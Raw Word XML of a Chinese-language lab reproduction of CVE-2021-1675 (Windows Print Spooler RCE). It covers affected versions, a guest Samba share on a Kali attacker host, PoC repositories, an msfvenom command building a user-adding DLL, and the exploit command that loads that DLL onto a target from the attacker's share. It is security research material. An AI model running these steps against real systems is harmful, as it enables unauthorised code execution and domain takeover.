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8"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>CVE-2021-1675: Windows Print Spooler远程代码执行漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:ind w:left="360" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars="0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ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>漏洞介绍：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="36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Windows Print Spooler是Windows的打印机后台处理程序，广泛的应用于各种内网中，攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证，并在打印服务器中安装恶意的驱动程序。若攻击者所控制的用户在域中，则攻击者可以连接到DC中的Spooler服务，并利用该漏洞在DC中安装恶意的驱动程序，完整的控制整个域环境。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="42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该漏洞广泛的存在于各Windows版本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到2021年6月29号为止为所有的windows版本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中，利用复杂度为中，但由于成功利用该漏洞的攻击者可以完整的控制域环境，造成非常严重的后果，所以该漏洞的利用价值极高。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漏洞影响版本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Server 2019 (Server Core installation)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Server 2019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Server 2016 (Server Core installation)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Server 2016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Server 2012 R2 (Server Core installation)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Server 2012 R2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Server 2012 (Server Core installation)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Server 2012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Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)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Server 2008 R2 for x64-based Systems Service Pack 1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Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)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Server 2008 for x64-based Systems Service Pack 2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Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)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Server 2008 for 32-bit Systems Service Pack 2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Server, version 2004 (Server Core installation)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RT 8.1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8.1 for x64-based systems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8.1 for 32-bit systems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7 for x64-based Systems Service Pack 1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7 for 32-bit Systems Service Pack 1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10 Version 1607 for x64-based Systems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10 Version 1607 for 32-bit Systems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10 for x64-based Systems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10 for 32-bit Systems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Server, version 20H2 (Server Core Installation)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10 Version 20H2 for ARM64-based Systems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10 Version 20H2 for 32-bit Systems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10 Version 20H2 for x64-based Systems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10 Version 2004 for x64-based Systems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10 Version 2004 for ARM64-based Systems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10 Version 2004 for 32-bit Systems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10 Version 21H1 for 32-bit Systems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10 Version 21H1 for ARM64-based Systems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10 Version 21H1 for x64-based Systems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10 Version 1909 for ARM64-based Systems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10 Version 1909 for x64-based Systems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10 Version 1909 for 32-bit Systems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10 Version 1809 for ARM64-based Systems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10 Version 1809 for x64-based Systems</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="360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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Windows 10 Version 1809 for 32-bit Systems</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:bCs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漏洞分析：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420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RpcAddPrinterDriver 的身份验证逻辑存在安全缺陷，由于参数可以被用户控制，攻击者可以通过其绕过安全检查并添加恶意驱动程序。如果攻击者控制的用户处于域环境，则攻击者可以连接到DC中的Spooler服务并在 DC 中安装恶意驱动程序，最终可以控制整个域环境。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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如图所示，箭头所指的参数是可以被用户控制的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="626" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roma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72055" cy="969645"/>
            <wp:effectExtent l="0" t="0" r="4445" b="1905"/>
            <wp:docPr id="15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漏洞复现场景：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:ind w:left="360" w:firstLine="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kali作为攻击机 192.168.2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ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:ind w:left="360" w:firstLine="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Window10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>作为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>靶机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.22.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>253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漏洞复现：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:ind w:left="360" w:firstLine="0"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漏洞复现方面可以参考：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>https://github.com/cube0x0/CVE-2021-1675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环境准备：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：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>首先配置kali的共享文件夹，参数配置如下表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[global]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map to guest = Bad User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server role = standalone server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usershare allow guests = yes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idmap config * : backend = tdb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smb ports = 445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[Share]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path = /home/kali/Desktop/Share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guest ok = yes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punlic = no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browsable = yes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="420"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进入文件夹/etc/samba/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0"/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2953385" cy="993775"/>
            <wp:effectExtent l="0" t="0" r="1841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修改samba配置文件smb.conf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1961515" cy="1566545"/>
            <wp:effectExtent l="0" t="0" r="63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/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pP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安装impacket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首先卸载原有的impacket（如果有的话）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pip3 uninstall impacket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下载impacket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git clone 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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://github.com/cube0x0/impacket" </w:instrTex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https://github.com/cube0x0/impacket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进入impacket文件夹，执行命令：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python3 setup.py install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3"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChar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开启靶机windows10的smb服务,并关闭防火墙。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587625" cy="1941195"/>
            <wp:effectExtent l="0" t="0" r="317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051175" cy="2434590"/>
            <wp:effectExtent l="0" t="0" r="15875" b="381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sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left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攻击复现：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left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（1）在kali中下载好的poc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>poc下载：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>git clone https://github.com/Dor-Tumarkin/CVE-2021-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1675</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:shd w:val="pct10" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.git</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="20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0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0"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>针对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>靶机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>系统类型修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>poc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>代码：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宋体" w:cs="Times New Roman"/>
          <w:sz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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 在靶机中，进入下图中的文件夹，找到UNIDRV.DLL文件</w:t>
      </w:r>
    </w:p>
    <w:p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271135" cy="200660"/>
            <wp:effectExtent l="0" t="0" r="5715" b="889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将该文件路径复制到kali机的poc文件如图所示位置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649980"/>
            <wp:effectExtent l="0" t="0" r="12065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eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>制作dll脚本文件，其中包含的远程命令为添加一个用户（可以自己制作特定功能的dll脚本，比如权限提升等等）。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宋体" w:cs="Times New Roman"/>
          <w:sz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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>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</w:rPr>
        <w:t xml:space="preserve">msfvenom -p windows/x64/exec CMD="net user </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas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test1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</w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas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test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</w:rPr>
        <w:t xml:space="preserve"> /add" -o ~/Desktop/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas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Share/lzk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</w:rPr>
        <w:t>.dll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hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="2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689475" cy="1346835"/>
            <wp:effectExtent l="0" t="0" r="15875" b="571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宋体" w:cs="Times New Roman"/>
          <w:sz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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t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eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>执行poc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Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>命令：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宋体" w:cs="Times New Roman"/>
          <w:sz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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 CVE--1675.py nsfocus:nsf0cus.@192.168.22.253 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="20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sz w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>\\\\192.168.22.18\\Share\\lzk.dll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="20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宋体" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4504055" cy="1952625"/>
            <wp:effectExtent l="0" t="0" r="10795" b="952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523105" cy="2717165"/>
            <wp:effectExtent l="0" t="0" r="10795" b="698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674235" cy="2473325"/>
            <wp:effectExtent l="0" t="0" r="12065" b="317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hd w:val="pct10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9A3939"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="B19A3939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abstractNum w:abstractNumId="1">
    <w:nsid w:val="2FB32335"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="2FB32335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61BE7F9D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="61BE7F9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BE"/>
    <w:rsid w:val="00001137"/>
    <w:rsid w:val="00066D2A"/>
    <w:rsid w:val="000E696A"/>
    <w:rsid w:val="00104D6A"/>
    <w:rsid w:val="001A51A9"/>
    <w:rsid w:val="00206D03"/>
    <w:rsid w:val="00225FE9"/>
    <w:rsid w:val="002C0F7A"/>
    <w:rsid w:val="00365831"/>
    <w:rsid w:val="00406C50"/>
    <w:rsid w:val="00447817"/>
    <w:rsid w:val="004728BE"/>
    <w:rsid w:val="00507061"/>
    <w:rsid w:val="005E7D0B"/>
    <w:rsid w:val="007210D6"/>
    <w:rsid w:val="00731F31"/>
    <w:rsid w:val="0076194C"/>
    <w:rsid w:val="00797903"/>
    <w:rsid w:val="00854088"/>
    <w:rsid w:val="00973E4C"/>
    <w:rsid w:val="009755B0"/>
    <w:rsid w:val="00C609ED"/>
    <w:rsid w:val="00E52257"/>
    <w:rsid w:val="09486B02"/>
    <w:rsid w:val="1A224911"/>
    <w:rsid w:val="21301657"/>
    <w:rsid w:val="21EE47DC"/>
    <w:rsid w:val="236123E2"/>
    <w:rsid w:val="31D758AB"/>
    <w:rsid w:val="41231764"/>
    <w:rsid w:val="4CA54F99"/>
    <w:rsid w:val="4F84780C"/>
    <w:rsid w:val="613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character" w:styleId="7">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="4"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8">
    <w:name w:val="jlqj4b"/>
    <w:basedOn w:val="4"/>
    <w:qFormat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461</Words>
  <Characters>2632</Characters>
  <Lines>21</Lines>
  <Paragraphs>6</Paragraphs>
  <TotalTime>5</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>3087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2021-06-29T07:02:00Z</dcterms:created>
  <dc:creator>admin</dc:creator>
  <cp:lastModifiedBy>lizhikai</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-01T03:38:58Z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3192258BD89D4B5AA7616E8C79E9BE0F</vt:lpwstr>
  </property>
</Properties>
</file>